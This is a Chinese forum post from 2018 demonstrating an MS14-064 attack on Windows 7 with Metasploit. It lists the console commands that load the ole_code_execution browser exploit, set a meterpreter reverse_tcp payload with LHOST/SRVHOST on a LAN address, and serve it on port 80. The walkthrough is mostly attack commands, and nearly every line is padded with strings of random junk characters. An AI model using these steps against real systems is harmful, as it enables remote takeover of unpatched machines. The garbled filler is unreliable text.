找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1405|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ e4 u( ^) t( H- y+ [, ] 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 $ E4 w1 w1 k# u0 B) {% w

: R" G8 [' U4 \8 E' b

/ M$ o7 k4 q- W' M 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 1 a- j+ M* H4 U5 \' v

7 V9 d7 |7 `- v* t

[6 `; v# z: \- j! a0 K7 b$ a 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp - [1 O& w/ {& Y4 T

7 Z8 J. s( X5 q( T8 W6 ]' j

) E# o% Q+ N! Z% T             set AllowPowershellPrompt true * z& L1 z5 W$ u% b$ D( N. q( ]( l" ~8 }

% V! _# n4 F; r5 i4 D4 }' v

7 g- B8 v: [2 r1 c             Set LHOST 192.168.0.109 0 K# d/ C* \2 q4 J2 }0 z

3 t! Q: W3 _+ K$ c

6 D6 G; K1 E# Y2 ?             set SRVHOST 192.168.0.109& y) t/ L3 x# T$ G

; w" @; i. r9 a9 b- z4 M

# u% J6 S& |( o; V             Set uripath share " f% C8 d& G: e2 w \

l) L2 |& ?+ r s

3 ?8 d5 N" V9 ~6 n             Set srvport 80+ @& Z8 H& o( {4 O

4 ^/ N3 U# o! U9 e

7 O; C D9 O$ j& i- t   # Y, j4 S* U9 `

+ b% D* a' T, y+ U

. `3 i: l' Z+ e8 T+ ] w3 E5 u  3 d3 {' F# Y& t# Y' b4 n8 A; @. T

* w* o$ T, B e8 I/ Q

- P! z& K: z& |3 s  , m/ D8 k& T$ C E. P7 R% v

) B N- c/ X4 a6 c

3 L+ B( B, @( n) D' g8 z   0 b1 U6 [% P7 t0 N4 l" r

7 X/ X9 I, T) \! y

/ C' S& ]2 h. h  ' [! T, S2 d& _7 `0 j- R4 Q

" I- s+ U* g" u/ R' k0 t+ M0 q

9 e: k( W( c% {5 [% ~6 n 下面我们来访问本地地址如图: 1 a p0 X. F4 ]" t' ^* t

5 V) b7 ^7 H! ]3 B6 m

1 I( K' J9 G' j( c' h  ( O) a. S/ v; L

0 E# z& X9 g, C8 ]

+ ^3 @. s4 Q/ P6 ?6 B6 K  % W6 b3 t4 Y0 Y/ F, X

9 q3 F# }9 _7 F6 F7 ?

% H% D, k9 V) V& S ]/ y7 L - ~& d2 t$ E, r8 ^

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表